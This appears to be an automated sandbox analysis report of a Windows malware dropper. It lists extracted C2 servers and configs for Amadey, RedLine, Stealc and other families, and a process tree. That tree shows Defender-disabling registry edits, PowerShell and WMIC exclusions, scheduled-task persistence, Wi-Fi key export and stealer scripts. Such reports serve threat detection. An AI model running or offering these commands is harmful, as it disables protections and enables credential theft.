Analysis
-
max time kernel
8s -
max time network
306s -
platform
windows10-1703_x64 -
resource
win10-20240611-en -
resource tags
-
submitted
19-09-2024 22:42
General
-
Target
ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe
-
Size
1.9MB
-
MD5
0707edd94178c25050cd0cd41474f694
-
SHA1
56bb66a14ea3da177a3db58dfbcb86f958169f9e
-
SHA256
ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787
-
SHA512
823bdfe780c723a2eb2390c471647c84fb88723e6b87d07d6ba1d44bb1c9c10d51de9fb903f9204d5e145f93b7e8d0694c1b38d43c2f2a740976f00c66b5701c
-
SSDEEP
49152:DIw8qoSIHGwkJU2TZYFN9NhXC/vUEp+KKr:DxZoSIG02ab9LS/vXM
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
LiveTraffic
95.179.250.45:26212
Extracted
redline
@OLEH_PSP
65.21.18.51:45580
Extracted
stealc
default2
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
redline
bundle
185.215.113.67:15206
Extracted
stealc
default
http://91.202.233.158
-
url_path
/e96ea2db21fa9a1b.php
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Extracted
cryptbot
sevtvf17ht.top
analforeverlovyu.top
-
url_path
/v1/upload.php
Extracted
gcleaner
80.66.75.114
45.91.200.135
Extracted
stealc
rave
http://185.215.113.103
-
url_path
/e2b1563c6670f193.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Detects ZharkBot payload 2 IoCs
ZharkBot is a botnet written C++.
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
ZharkBot
ZharkBot is a botnet written C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
.NET Reactor proctector 12 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 6 IoCs
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Indirect Command Execution 1 TTPs 51 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 15 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 25 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe"C:\Users\Admin\AppData\Local\Temp\ca6a46d48c0952e16017a9625c0270150ce319559d65a07e088e26a957292787.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\dY9LLS3hOU.exe"C:\Users\Admin\AppData\Roaming\dY9LLS3hOU.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\aQQHqRdNJg.exe"C:\Users\Admin\AppData\Roaming\aQQHqRdNJg.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"6⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 5205⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 5485⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 7725⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 8325⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 8485⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 8645⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 9645⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 11245⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 11565⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 12165⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 16724⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 1765⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6076985⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomCompositionInjection" Participants5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\607698\Waters.pifWaters.pif Q5⤵
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5F9F.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS63B6.tmp\Install.exe.\Install.exe /RNXdidDHt "385121" /S5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS63B6.tmp\Install.exe\" PV /MUDxdidmbUZ 385121 /S" /V1 /F6⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Temp\trkdkf.exe"C:\Users\Admin\AppData\Local\Temp\trkdkf.exe"4⤵
-
C:\Users\Admin\Documents\UnRAR.exe"C:\Users\Admin\Documents\UnRAR.exe" x -y "C:\Users\Admin\Documents\7.rar" "C:\Users\Admin\Documents\"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\tokensdis.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\browsers.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\wallets.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\firefox.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\firefoxex.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\steam.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\info.py"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵
-
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\screen.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\wifi.py"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "whoami"6⤵
-
C:\Windows\SysWOW64\whoami.exewhoami7⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan export profile key=clear"6⤵
-
C:\Windows\SysWOW64\netsh.exenetsh wlan export profile key=clear7⤵
-
-
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\FileGrabber.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\telegr2am.py"5⤵
-
-
C:\Users\Admin\Documents\python.exe"C:\Users\Admin\Documents\\python.exe" "C:\Users\Admin\Documents\\py.py"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\tstgjl.exe"C:\Users\Admin\AppData\Local\Temp\tstgjl.exe"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\kgzsjm.exe"C:\Users\Admin\AppData\Local\Temp\kgzsjm.exe"4⤵
-
C:\Users\Admin\Documents\UnRAR.exe"C:\Users\Admin\Documents\UnRAR.exe" x -y "C:\Users\Admin\Documents\m.rar" "C:\Users\Admin\Documents\"5⤵
-
-
C:\Users\Admin\Documents\xmrig.exe"C:\Users\Admin\Documents\\xmrig.exe" "C:\Users\Admin\Documents\\--config config.json"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000308001\c2fcf7c4be.exe"C:\Users\Admin\AppData\Local\Temp\1000308001\c2fcf7c4be.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000309001\f908468511.exe"C:\Users\Admin\AppData\Local\Temp\1000309001\f908468511.exe"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.0.1100634240\866419250" -parentBuildID 20221007134813 -prefsHandle 1612 -prefMapHandle 1556 -prefsLen 20935 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd21895e-a53f-406a-b428-79fdaee615e8} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 1692 22394108e58 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.1.1103989150\244462261" -parentBuildID 20221007134813 -prefsHandle 2124 -prefMapHandle 2120 -prefsLen 21796 -prefMapSize 233414 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bd699f2-6c20-4a60-82f6-6e2c1930eb0d} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 2152 22388e70158 socket6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.2.294145961\1153989191" -childID 1 -isForBrowser -prefsHandle 2796 -prefMapHandle 2708 -prefsLen 21899 -prefMapSize 233414 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93800ce6-da27-4e1c-a767-788ef65adc52} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 2956 22396d37558 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.3.1248087490\1524025067" -childID 2 -isForBrowser -prefsHandle 3496 -prefMapHandle 3492 -prefsLen 26212 -prefMapSize 233414 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {570e9f50-3464-49fc-ac28-e030f4d9fafc} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 3508 22388e66258 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.4.1338082381\886308355" -childID 3 -isForBrowser -prefsHandle 4848 -prefMapHandle 4836 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {368be574-4349-4b65-ac2a-cad099a81760} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 4808 2239a32c758 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.5.1610921945\363399554" -childID 4 -isForBrowser -prefsHandle 4832 -prefMapHandle 4844 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8597a34e-b513-4a01-b9e8-8f6a9ad83b93} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 4812 2239a32e858 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4032.6.478568487\1854231081" -childID 5 -isForBrowser -prefsHandle 4968 -prefMapHandle 5060 -prefsLen 26195 -prefMapSize 233414 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cd144a5-24ce-45fd-af33-65f4e09e96b3} 4032 "\\.\pipe\gecko-crash-server-pipe.4032" 5144 2239a63d558 tab6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6028.0.1666665690\2077101410" -parentBuildID 20221007134813 -prefsHandle 1600 -prefMapHandle 1588 -prefsLen 21213 -prefMapSize 233466 -appDir "C:\Program Files\Mozilla Firefox\browser" - {47de75af-b03e-4166-8fc7-0bcd24032d7a} 6028 "\\.\pipe\gecko-crash-server-pipe.6028" 1692 20193ed7a58 gpu6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.0.262718322\475009531" -parentBuildID 20221007134813 -prefsHandle 1564 -prefMapHandle 1552 -prefsLen 21293 -prefMapSize 233578 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ead97e6-0baa-4f82-b3ea-1911833b4f1a} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 1656 1e3207f9b58 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.1.988973267\2085723902" -parentBuildID 20221007134813 -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 22154 -prefMapSize 233578 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a87adeb4-239a-4de2-9c1b-308ca9f94318} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 2088 1e31fcda258 socket6⤵
-
-
